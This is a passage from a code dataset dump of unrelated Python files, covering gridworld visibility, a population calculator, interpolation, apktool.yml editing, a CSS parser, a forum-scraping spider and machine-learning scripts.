visibility[y, x + 1] = True\n if y > 0:\n visibility[y - 1, x] = True\n visibility[y - 1, x + 1] = True\n\n for x in range(grid.width - 1, 0, -1):\n if visibility[y, x] and grid[y, x].transparent:\n visibility[y, x - 1] = True\n if y > 0:\n visibility[y - 1, x] = True\n visibility[y - 1, x - 1] = True\n\n return visibility\n\n\ndef raytracing_visibility(\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None, # pylint: disable=unused-argument\n) -> np.ndarray:\n\n area = Area((0, grid.height - 1), (0, grid.width - 1))\n rays = cached_compute_rays_fancy(position, area)\n\n counts_num = np.zeros((area.height, area.width), dtype=int)\n counts_den = np.zeros((area.height, area.width), dtype=int)\n\n for ray in rays:\n light = True\n for pos in ray:\n if light:\n counts_num[pos.y, pos.x] += 1\n\n counts_den[pos.y, pos.x] += 1\n\n light = light and grid[pos].transparent\n\n # TODO add as parameter to function\n visibility = counts_num > 0 # at least one ray makes it\n # visibility = counts_num > 0.5 * counts_den # half of the rays make it\n # visibility = counts_num > 0.1 * counts_den # 10% of the rays make it\n # visibility = counts_num > 1 # at least 2 rays make it\n\n return visibility\n\n\ndef stochastic_raytracing_visibility( # TODO add test\n grid: Grid,\n position: Position,\n *,\n rng: Optional[rnd.Generator] = None,\n) -> np.ndarray:\n rng = get_gv_rng_if_none(rng)\n\n area = Area((0, grid.height - 1), (0, grid.width - 1))\n rays = cached_compute_rays_fancy(position, area)\n\n counts_num = np.zeros((area.height, area.width), dtype=int)\n counts_den = np.zeros((area.height, area.width), dtype=int)\n\n for ray in rays:\n light = True\n for pos in ray:\n if light:\n counts_num[pos.y, pos.x] += 1\n\n counts_den[pos.y, pos.x] += 1\n\n light = light and grid[pos].transparent\n\n probs = np.nan_to_num(counts_num / counts_den)\n visibility = probs <= rng.random(probs.shape)\n return visibility\n\n\ndef factory(name: str) -> VisibilityFunction:\n\n if name == 'full_visibility':\n return full_visibility\n\n if name == 'partial_visibility':\n return partial_visibility\n\n if name == 'minigrid_visibility':\n return minigrid_visibility\n\n if name == 'raytracing_visibility':\n return raytracing_visibility\n\n if name == 'stochastic_raytracing_visibility':\n return stochastic_raytracing_visibility\n\n raise ValueError(f'invalid visibility function name {name}')\n","sub_path":"gym_gridverse/envs/visibility_functions.py","file_name":"visibility_functions.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"376215328","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 16:39:11 2018\n\n@author: tirilkoplandtrondsen\n\"\"\"\n\n#Oppgave 3\n#Et program som beregner dyrebefolkningen t år fra i dag.\n\n\ndef regnPopulasjonsendring(): #Lager en funksjon\n bgammel = int(input(\"Hvor stor er den nåværende dyrebefolkningen? \"))\n t = int(input(\"Over hvor mange år skjer populasjonsendringen? \"))\n ps = input(\"Stiger populasjonen? ja / nei \")\n \n if ps == 'ja':\n p = float(input(\"Hvor mange prosent stiger populasjonen?\"))\n bny = (bgammel * (1+ (p/100)) **t )\n print (\"Det er \" + str(bny) + \" etter \" + str(t) + \" år.\" )\n \n elif ps == 'nei':\n p = float(input(\"Hvor mange prosent synker populasjonen? \"))\n bny = (bgammel * (1 - (p/100))**t)\n print ( \"Det er \" + str(bny) + \" etter \" + str(t) + \" år.\")\n \n else:\n print (\"Feil inndata, prøv på nytt.\")\n\nwhile 1: #Lager en løkke\n regnPopulasjonsendring()\n spm = input(\"Vil du regne det ut en gang til? ja / nei \")\n if spm == 'nei':\n break","sub_path":"oppgave3.py","file_name":"oppgave3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359713805","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nESAME 16 Febbraio 2021 - Esercizio 1.\nINTEPOLAZIONE POLINOMIALE\n\"\"\"\n\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\ndef pol_lagrange(nodes, j):\n zeros = np.zeros_like(nodes)\n \n if j == 0:\n zeros = nodes[1:]\n else:\n zeros = np.append(nodes[:j], nodes[j+1:])\n \n num = np.poly(zeros)\n den = np.polyval(num, nodes[j])\n return num / den\n\ndef lagrange_interpl(nodes, ordinates, points):\n n = nodes.size\n m = points.size\n L = np.empty((n, m))\n \n for k in range(n):\n k_pol = pol_lagrange(nodes, k)\n L[k, :] = np.polyval(k_pol, points)\n \n return np.dot(ordinates, L)\n\na = 0\nb = 2\nx_axis = np.linspace(a, b)\nfunction = lambda x : np.cos(math.pi * x) + np.sin(math.pi * x)\nnodes = np.array([1, 1.5, 1.75])\n\npol_intrpl = lagrange_interpl(nodes, function(nodes), x_axis)\n\nplt.plot(x_axis, function(x_axis), x_axis, pol_intrpl, nodes, function(nodes), '*')\nplt.legend([\"f(x)\", \"Polinomio interpolante\", \"Nodi equispaziati\"])\nplt.show()\n\n'''\nOsservando che l'errore di interpolazione in x = 0.75 è pari a 0, si può facilmente intuire che x = 0.75 è \nun nodo interpolatorio per il polinomio calcolato. Quindi ricalcolare il polinomio interpolante dandodogli in \ninput anche quest'ultimo non causerà nessun effetto.\n'''\nx = 0.75\nresto = abs(function(x) - lagrange_interpl(nodes, function(nodes), np.array([x])))\nprint(resto)\n\nnp.append(nodes, x)\npol_intrpl2 = lagrange_interpl(nodes, function(nodes), x_axis)\n\nplt.plot(x_axis, function(x_axis), x_axis, pol_intrpl2, nodes, function(nodes), '*')\nplt.legend([\"f(x)\", \"Polinomio interpolante 2\", \"Nodi equispaziati\"])\nplt.show()","sub_path":"simulazioni/a16-02-21/es2.py","file_name":"es2.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"638249450","text":"# -*- coding: utf-8 -*-\n# Author:xiaohei\n# CreateTime:2018-11-16\n#\n# All operations for apktool.yml\n#\n#\n\nimport os\nimport os.path\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import SubElement\nfrom xml.etree.ElementTree import Element\nfrom xml.etree.ElementTree import ElementTree\nfrom xml.dom import minidom\nimport log_utils\nimport file_utils\n\n\ndef parse_version_info(ymlPath):\n \"\"\"\n parse versionCode and versionName in apktool.yml\n \"\"\"\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n return (\"0\", \"1.0.0\")\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n versionCode = \"0\"\n versionName = \"1.0.0\"\n\n for line in lines:\n if 'versionCode' in line:\n versionCode = line.replace('versionCode:', '').strip().replace(\"'\", \"\")\n\n elif 'versionName' in line:\n versionName = line.replace('versionName:', '').strip().replace(\"'\", \"\")\n\n return (versionCode, versionName)\n\n\ndef modify_version_info(ymlPath, newPackageName, versionCode, versionName, minSdkVersion, targetSdkVersion,\n maxSdkVersion):\n \"\"\"\n modify version info in apktool.yml\n \"\"\"\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n return\n\n minSdkStr = None\n targetSdkStr = None\n maxSdkStr = None\n\n if minSdkVersion != None:\n minSdkStr = \"minSdkVersion: '\" + minSdkVersion + \"'\"\n\n if targetSdkVersion != None:\n targetSdkStr = \"targetSdkVersion: '\" + targetSdkVersion + \"'\"\n\n if maxSdkVersion != None:\n maxSdkStr = \"maxSdkVersion: '\" + maxSdkVersion + \"'\"\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n newLines = []\n for line in lines:\n if 'versionCode' in line and versionCode is not None:\n newLines.append(\" versionCode: '\" + versionCode + \"'\\n\")\n elif 'versionName' in line and versionName is not None:\n newLines.append(\" versionName: \" + versionName + \"\\n\")\n elif 'sdkInfo' in line:\n continue\n elif 'minSdkVersion' in line:\n if minSdkVersion == None:\n minSdkStr = line.strip()\n elif 'targetSdkVersion' in line:\n if targetSdkVersion == None:\n targetSdkStr = line.strip()\n elif 'maxSdkVersion' in line:\n if maxSdkVersion == None:\n maxSdkStr = line.strip()\n elif 'renameManifestPackage' in line and ('null' not in line):\n newLines.append(\" renameManifestPackage: \" + packageName + \"\\n\")\n\n else:\n newLines.append(line)\n\n if minSdkVersion != None or targetSdkVersion != None or maxSdkVersion != None:\n newLines.append('sdkInfo:\\n')\n if minSdkVersion != None:\n newLines.append(\" \" + minSdkStr + \"\\n\")\n\n if targetSdkVersion != None:\n newLines.append(\" \" + targetSdkStr + \"\\n\")\n\n # if maxSdkVersion != None:\n # newLines.append(\" \"+maxSdkStr + \"\\n\")\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n\n\ndef add_compress_regx(ymlPath, compressRegx):\n \"\"\"\n remove matched compress types from doNotCompress tag\n \"\"\"\n\n if compressRegx == None or len(compressRegx) == 0:\n return\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + ymlPath)\n return\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n handlingCompress = False\n\n newLines = []\n for line in lines:\n\n if 'doNotCompress:' in line:\n handlingCompress = True\n newLines.append(line)\n elif handlingCompress and line.startswith('-'):\n currLine = line[1:].strip()\n matchs = [c for c in compressRegx if c == currLine]\n if len(matchs) <= 0:\n newLines.append(line)\n\n else:\n handlingCompress = False\n newLines.append(line)\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n\n\ndef add_uncompress_regx(ymlPath, uncompressRegx):\n \"\"\"\n add uncompress types into doNotCompress\n \"\"\"\n\n if uncompressRegx == None or len(uncompressRegx) == 0:\n return\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + uncompressRegx)\n return\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n handlingCompress = False\n\n existsUnCompressSet = list()\n\n for line in lines:\n\n if 'doNotCompress:' in line:\n handlingCompress = True\n elif handlingCompress and line.startswith('-'):\n currLine = line[1:].strip()\n existsUnCompressSet.append(currLine)\n\n else:\n handlingCompress = False\n\n appendItems = list()\n for uncompressItem in uncompressRegx:\n\n matchItems = [c for c in existsUnCompressSet if c == uncompressItem]\n\n if len(matchItems) > 0:\n continue\n\n appendItems.append(uncompressItem)\n\n if len(appendItems) > 0:\n\n newLines = list()\n for line in lines:\n\n if 'doNotCompress:' in line:\n newLines.append(line)\n\n for aitem in appendItems:\n newLines.append(\"- \" + aitem + \"\\n\")\n\n else:\n newLines.append(line)\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n\n\ndef modify_doNotCompress(ymlPath, uncompressRegx):\n \"\"\"\n modify uncompress types into doNotCompress\n \"\"\"\n\n if uncompressRegx == None or len(uncompressRegx) == 0:\n return\n\n if not os.path.exists(ymlPath):\n log_utils.warning(\"the apktool.yml is not exists \" + uncompressRegx)\n return\n\n ymlFile = open(ymlPath, 'r')\n lines = ymlFile.readlines()\n ymlFile.close()\n\n if 'arsc' not in uncompressRegx:\n uncompressRegx.insert(0, 'arsc')\n\n newLines = list()\n inDoNotCompress = False\n for line in lines:\n\n if 'doNotCompress:' in line:\n newLines.append(line)\n inDoNotCompress = True\n\n for aitem in uncompressRegx:\n newLines.append(\"- \" + aitem + \"\\n\")\n\n elif line.strip().startswith('-') and inDoNotCompress:\n continue\n\n else:\n inDoNotCompress = False\n newLines.append(line)\n\n content = ''\n for line in newLines:\n content = content + line\n\n ymlFile = open(ymlPath, 'w')\n ymlFile.write(content)\n ymlFile.close()\n","sub_path":"client/android/scripts/yml_utils.py","file_name":"yml_utils.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128689538","text":"import platform\nimport subprocess\n\nimport os\nimport cat_service\n\n\ndef main():\n\tprint_header()\n\n\tfolder = get_or_create_output_folder()\n\tprint(f'Found or created folder: {folder}')\n\n\tdownload_cats(folder)\n\tdisplay_cats(folder)\n\n\ndef print_header():\n\tprint('---------------------------')\n\tprint(' CAT FACTORY APP')\n\tprint('---------------------------')\n\n\ndef get_or_create_output_folder():\n\tfolder = 'cat_pictures'\n\n\tbase_path = os.path.dirname(__file__)\n\tfull_path = os.path.join(base_path, folder)\n\n\tif not os.path.exists(full_path) or not os.path.isdir(full_path):\n\t\tprint(f'Creating new directory at {full_path}')\n\t\tos.mkdir(full_path)\n\n\treturn full_path\n\n\ndef download_cats(folder):\n\tprint('Contacting server to download cats...')\n\tfor i in range(1, 9):\n\t\tname = f'lolcat_{i}'\n\t\tprint(f'Downloading cat {name}')\n\t\tcat_service.get_cat(folder, name)\n\n\tprint('Done.')\n\n\ndef display_cats(folder):\n\tif platform.system() == 'Darwin':\n\t\tsubprocess.call(['open', folder])\n\telif platform.system() == 'Linux':\n\t\tsubprocess.call(['xdg-open', folder])\n\telif platform.system() == 'Windows':\n\t\tsubprocess.call(['explorer', folder])\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"06_cat_factory_app/cat_factory.py","file_name":"cat_factory.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234699996","text":"import copy\n\nimport tinycss2\nfrom tinycss2.ast import (Comment, CurlyBracketsBlock, HashToken, IdentToken,\n LiteralToken, WhitespaceToken, FunctionBlock)\n\n\nclass BadCss(Exception):\n pass\n\nclass CssRule:\n def __init__(self, rule):\n self.rule = self._clean_comments(rule)\n print(self.rule)\n self.rule = self._remove_whitespace_nodes(self.rule)\n self.rule_types = self._determine_rule_type(self.rule)\n self.typeless_rule = self._remove_type_nodes(self.rule)\n if type(self.typeless_rule[0]) is not HashToken or self.typeless_rule[0].value != \"lpChat\":\n print(\"Bad Rule: \", self.typeless_rule)\n raise BadCss(\"First element in heirarchy should be the '#lpChat' selector.\")\n self.selector_string = self._generate_selector_string(self.typeless_rule)\n self.curly_brackets_node = self._get_curly_brackets_block(self.typeless_rule)\n self.css_properties = self._get_css_properties_string(self.curly_brackets_node)\n\n def _clean_comments(self, rule):\n remove_nodes = []\n for node in rule:\n if type(node) is Comment:\n remove_nodes.append(node)\n for node in remove_nodes:\n rule.remove(node)\n return rule\n\n\n def _remove_whitespace_nodes(self, rule):\n remove_nodes = []\n for node in rule:\n if type(node) is WhitespaceToken:\n remove_nodes.append(node)\n else:\n break\n for node in reversed(rule):\n if type(node) is WhitespaceToken:\n remove_nodes.append(node)\n else:\n break\n for node in remove_nodes:\n rule.remove(node)\n return rule\n \n def _set_rule_type(self, rule_types, new_value):\n if new_value not in rule_types:\n rule_types.append(new_value)\n return rule_types\n \n def _determine_rule_type(self, rule):\n rule_types = []\n for token_index in range(len(rule)):\n token = rule[token_index]\n if type(token) is IdentToken:\n if \"mobile\" in token.value:\n rule_types = self._set_rule_type(rule_types, \"mobile\")\n elif \"desktop\" in token.value:\n rule_types = self._set_rule_type(rule_types, \"desktop\")\n if len(rule_types) == 0:\n rule_types = [\"mobile\", \"desktop\"]\n return rule_types\n \n def _remove_type_nodes(self, rule):\n remove_nodes = []\n for token_index in range(len(rule)):\n token = rule[token_index]\n if type(token) is IdentToken:\n if \"mobile\" in token.value or \"desktop\" in token.value:\n remove_nodes.append(rule[token_index - 1])\n remove_nodes.append(token)\n remove_nodes.append(rule[token_index + 1])\n for node in remove_nodes:\n rule.remove(node)\n return rule\n\n def _generate_selector_string(self, rule):\n selector_string = \"\"\n for node in rule:\n if type(node) is HashToken and node.value == \"lpChat\":\n selector_string += \"$lpWindowElementId\"\n elif type(node) is not CurlyBracketsBlock:\n selector_string += node.value\n return selector_string\n\n def _get_curly_brackets_block(self, rule):\n for node in rule:\n if type(node) is CurlyBracketsBlock:\n return node\n \n def _get_css_properties_string(self, curly_brackets):\n print(\"DEBUG: Curly Brackets Is: \", curly_brackets.content)\n trimmed_content = self._remove_whitespace_nodes(curly_brackets.content)\n css_properties = \"\"\n for content_index in range(len(trimmed_content)):\n node = trimmed_content[content_index]\n if type(node) is WhitespaceToken:\n css_properties += \" \"\n else:\n css_properties += node.serialize()\n return css_properties\n\n def generate_value_objects(self):\n ''' Will take the state of the self.rule attribute and create an array of \n value objects to add to the base taglet config object '''\n \n base_object = {\n \"selector\": \"\",\n \"outcomes\": {}\n }\n\n values = []\n for rule_type in self.rule_types:\n temp_value = copy.deepcopy(base_object)\n temp_value[\"selector\"] = self.selector_string\n temp_value[\"outcomes\"][rule_type] = [{\n \"type\": \"style\",\n \"value\": self.css_properties\n }]\n values.append(temp_value)\n return values\n","sub_path":"css_parser.py","file_name":"css_parser.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26022615","text":"# time: O(n * 2^n)\n# space: O(n * 2^n)\n# where n is the length of the input array\ndef powersetIterative(array):\n subsets = [[]]\n for elem in array:\n for i in range(len(subsets)):\n current = subsets[i]\n subsets.append(current + [elem])\n return subsets\n\ndef powersetRecursive(array, i = None):\n if i is None:\n i = len(array) - 1\n if i < 0:\n return [[]]\n elem = array[i]\n subsets = powersetRecursive(array, i - 1)\n for i in range(len(subsets)):\n currentSubset = subsets[i]\n subsets.append(currentSubset + [elem])\n return subsets\n\nprint(powersetIterative([1, 2, 3])) # [[], [1], [2], [1, 2], [3], [1, 3], [2, 3], [1, 2, 3]]\n","sub_path":"algo-expert/medium/recursion/powerset.py","file_name":"powerset.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248630301","text":"#!/usr/bin/python\nimport uuid\nimport scrapy\nfrom scrapy.spiders import Rule, CrawlSpider\nfrom scrapy.linkextractors import LinkExtractor\n\nfrom w3lib.html import remove_tags\nfrom ..items import ILoader, IItem, PostItem, PostLoader, created_at, clean_body\n\n\nclass ISpyder(CrawlSpider):\n name = ''\n allowed_domains = ['']\n start_urls = ['']\n\n rules = (\n Rule(LinkExtractor(allow=('viewforum', ), deny=('profile',)), follow=True, callback='parse_forum'),\n )\n\n def parse_forum(self, response):\n for x in response.xpath('//span[@class=\"topictitle\"]/a/@href'):\n yield scrapy.Request(response.urljoin(x.extract()), callback=self.parse_thread)\n\n def parse_thread(self, response):\n if response.meta.get('loader', ''):\n loader = response.meta['loader']\n thread_uuid = response.meta['thread_uuid']\n else:\n loader = ILoader(item=IItem(), response=response)\n thread_uuid = uuid.uuid4()\n loader.add_value('uuid', thread_uuid)\n loader.add_value('forum_uuid', 'XYZ')\n loader.add_value('third_party_id', response.url)\n loader.add_xpath('name', '//a[@class=\"maintitle\"]/text()')\n loader.add_xpath('created_at', '(//span[@class=\"postdetails\"][contains(text(),\"Posted\")]/text())[1]')\n loader.add_value('url', response.url)\n posts = []\n for id, name, date, body in zip(\n response.xpath('//span[@class=\"name\"]/a/@name').extract(),\n response.xpath('//span[@class=\"name\"]/b/text()').extract(),\n created_at(response.xpath(\n '(//span[@class=\"postdetails\"][contains(text(),\"Posted: \")]/text())').extract()[0::2]),\n clean_body(response.xpath('//tr/td[@colspan=\"2\"]').extract()[3:-1:3])\n ):\n post = PostItem()\n post['uuid'] = uuid.uuid4()\n post['thread_uuid'] = thread_uuid\n post['third_party_id'] = id\n post['member_name'] = name\n post['body'] = body\n post['created_at'] = date\n posts.append(post)\n loader.add_value('posts', posts)\n next_page = response.xpath('//a[text()=\"Next\"]/@href')\n if next_page:\n request = scrapy.Request(response.urljoin(next_page.extract()[0]), callback=self.parse_thread)\n request.meta['loader'] = loader\n request.meta['thread_uuid'] = thread_uuid\n yield request\n else:\n yield loader.load_item()\n","sub_path":"ispider.py","file_name":"ispider.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"608550814","text":"import torch\nimport torch.nn as nn\nimport torch.autograd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nfrom DataGenerator import DataGenerator\n\nclass NNModel(nn.Module):\n def __init__(self, in_dim: int, out_dim: int, hidden_dim: list) -> None:\n super(NNModel, self).__init__()\n self.hidden_layer_num = len(hidden_dim)\n hidden_dim = [in_dim] + hidden_dim + [out_dim]\n self.layers = []\n for i in range(self.hidden_layer_num):\n self.layer_i = nn.Sequential(\n nn.Linear(hidden_dim[i], hidden_dim[i+1]),\n nn.Tanh()\n )\n self.layers.append(self.layer_i)\n if self.hidden_layer_num:\n self.layer_end = nn.Linear(hidden_dim[-2], hidden_dim[-1])\n self.layers.append(self.layer_end)\n \n def forward(self, x: np.ndarray) -> np.ndarray:\n for layer in self.layers:\n x = layer(x)\n return x\n\n\ndef draw_split_line(x: np.ndarray, y: np.ndarray, model: nn.Module) -> None:\n x_min, x_max = x[:, 0].min() - 0.1, x[:, 0].max() + 0.1\n y_min, y_max = x[:, 1].min() - 0.1, x[:, 1].max() + 0.1\n h = 0.05\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n out = model(torch.from_numpy(np.c_[xx.ravel(), yy.ravel()]).float()).data.numpy()\n out = out > 0.5\n out = out.reshape(xx.shape)\n plt.contourf(xx, yy, out, camp=plt.cm.Spectral)\n plt.ylabel('x2')\n plt.xlabel('x1')\n plt.scatter(x[:, 0], x[:, 1], c=y.reshape(-1), s=40, cmap=plt.cm.Spectral)\n plt.show()\n\ndef get_shuffle_data():\n data_generator = DataGenerator()\n x_, y_ = data_generator.generate()\n x_, y_ = np.array(x_), np.array(y_)\n idx = np.arange(len(x_))\n np.random.shuffle(idx)\n x_, y_ = x_[idx], y_[idx]\n return x_, y_\n\n\ndef get_torch_model(hidden_dim, x_, y_):\n # x_, y_ = get_shuffle_data()\n model = NNModel(2, 1, hidden_dim) \n optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)\n criterion = nn.BCEWithLogitsLoss()\n num_epochs = 5000\n for epoch in range(num_epochs):\n out = model.forward(torch.from_numpy(x_).float())\n loss = criterion(out, torch.from_numpy(y_).float())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if epoch % 200 == 0:\n print(loss.detach().numpy())\n \n draw_split_line(x_, y_, model) \n return model\n\n\nif __name__ == \"__main__\":\n x_, y_ = get_shuffle_data()\n get_torch_model([4], x_, y_)\n get_torch_model([4, 2], x_, y_)","sub_path":"Assignment/A2 BP Network/NNWithTorch.py","file_name":"NNWithTorch.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"6815392","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 22 22:59:35 2018\r\n\r\n@author: Fwh_FrozenFire\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\ndf_concrete = pd.read_csv('concrete.csv')\r\nprint(df_concrete.head())\r\nprint(df_concrete.info())\r\ndf_concrete.columns = ['cement','slag','ash','water','superplastic','coarseagg','fineagg','age','strength']\r\ny=df_concrete['strength']\r\nX=df_concrete.drop(['strength'],axis = 1)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2, random_state=42)\r\nprint(\"=================================================================\")\r\n###################EDA####################\r\n\r\n#Pairplot\r\nsns.set(style='whitegrid', context='notebook')\r\ncols = ['cement','slag','ash','water','superplastic','coarseagg','fineagg','age','strength']\r\nsns.pairplot(df_concrete[cols], size=1.9)\r\nplt.show()\r\nprint(\"=================================================================\")\r\n#Heatmap\r\ncm = np.corrcoef(df_concrete[cols].values.T)\r\nsns.set(font_scale=1.5)\r\nfig, hm = plt.subplots(figsize=(10,10)) \r\nhm = sns.heatmap(cm, cbar=True,annot=True, square=True,fmt='.2f',annot_kws={'size': 15},yticklabels=cols,xticklabels=cols)\r\nplt.figure(figsize=(40,40))\r\nplt.show()\r\nprint(\"=================================================================\")\r\n#################Linear Regression##################\r\nfrom sklearn.linear_model import LinearRegression\r\nreg = LinearRegression(normalize = True)\r\nreg.fit(X_train,y_train)\r\ny_pred = reg.predict(X_test)\r\nplt.plot(X_test, y_pred, color='black', linewidth=3)\r\nplt.show()\r\n\r\n\r\n#Residual plot\r\nplt.scatter(y_pred,y_pred-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values LINEAR')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % reg.coef_[0],reg.coef_[1],reg.coef_[2],reg.coef_[3],reg.coef_[4]\r\n ,reg.coef_[5],reg.coef_[6],reg.coef_[7])\r\nprint('Y-Intercept: %.3f' % reg.intercept_)\r\n\r\nprint(\"R^2: {}\".format(reg.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_pred)\r\nprint(\"MSE: {}\".format(mse))\r\nprint(\"=================================================================\")\r\n################Ridge###################\r\nfrom sklearn.linear_model import Ridge\r\nridge = Ridge(alpha=0.1)\r\nridge.fit(X_train,y_train)\r\ny_predR = ridge.predict(X_test)\r\n\r\nplt.scatter(y_predR,y_predR-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values RIDGE')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % ridge.coef_[0],ridge.coef_[1],ridge.coef_[2],ridge.coef_[3],ridge.coef_[4]\r\n ,ridge.coef_[5],ridge.coef_[6],ridge.coef_[7])\r\nprint('Y-Intercept: %.3f' % ridge.intercept_)\r\n\r\nprint(\"R^2: {}\".format(ridge.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predR)\r\nprint(\"MSE: {}\".format(mse))\r\n\r\nprint(\"=================================================================\")\r\n################Lasso###################\r\nfrom sklearn.linear_model import Lasso\r\nlasso = Lasso(alpha=0.1)\r\nlasso.fit(X_train,y_train)\r\ny_predL = lasso.predict(X_test)\r\n\r\nplt.scatter(y_predL,y_predL-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values LASSO')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % lasso.coef_[0],lasso.coef_[1],lasso.coef_[2],lasso.coef_[3],lasso.coef_[4]\r\n ,lasso.coef_[5],lasso.coef_[6],lasso.coef_[7])\r\nprint('Y-Intercept: %.3f' % lasso.intercept_)\r\n\r\nprint(\"R^2: {}\".format(lasso.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predL)\r\nprint(\"MSE: {}\".format(mse))\r\nprint(\"=================================================================\")\r\n################Elastic###################\r\nfrom sklearn.linear_model import ElasticNet\r\nelanet = ElasticNet(alpha=0.1, l1_ratio=0.5)\r\nelanet.fit(X_train,y_train)\r\ny_predE = elanet.predict(X_test)\r\n\r\nplt.scatter(y_predE,y_predE-y_test,\tc='blue',marker='s',edgecolor='white',\tlabel='Test data')\r\nplt.xlabel('Predicted values ELASTICNET')\r\nplt.ylabel('Residuals')\r\nplt.legend(loc='upper left')\r\nplt.hlines(y=0,xmin=0,xmax=100,color='black',lw=2)\r\nplt.xlim([0,100])\r\nplt.show()\r\nprint('Slope: %.3f' % elanet.coef_[0],elanet.coef_[1],elanet.coef_[2],elanet.coef_[3],elanet.coef_[4]\r\n ,elanet.coef_[5],elanet.coef_[6],elanet.coef_[7])\r\nprint('Y-Intercept: %.3f' % elanet.intercept_)\r\n\r\nprint(\"R^2: {}\".format(elanet.score(X_test, y_test)))\r\nmse = mean_squared_error(y_test,y_predE)\r\nprint(\"MSE: {}\".format(mse))\r\n\r\n###################################################\r\nprint(\"=================================================================\")\r\nprint(\"My name is Ning Fan\")\r\nprint(\"My NetID is: 673869376\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"IE598_F18_HW4/DA_Concrete.py","file_name":"DA_Concrete.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"563321035","text":"import heapq\n\nimport networkx\nimport numpy as np\nimport progressbar\nimport ray\nimport torch\nfrom py4j.java_gateway import JavaGateway\nfrom ray.rllib.agents.ppo import ppo\n\nfrom environment.bouncing_ball_old import BouncingBall\nfrom polyhedra.experiments_nn_analysis import Experiment\nfrom runnables.runnable.templates import polytope\nfrom runnables.runnable.templates.dikin_walk_simplified import plot_points_and_prediction\nfrom training.ppo.tune.tune_train_PPO_bouncing_ball import get_PPO_config\nfrom training.ray_utils import convert_ray_policy_to_sequential\n\nray.init()\nnn_path = 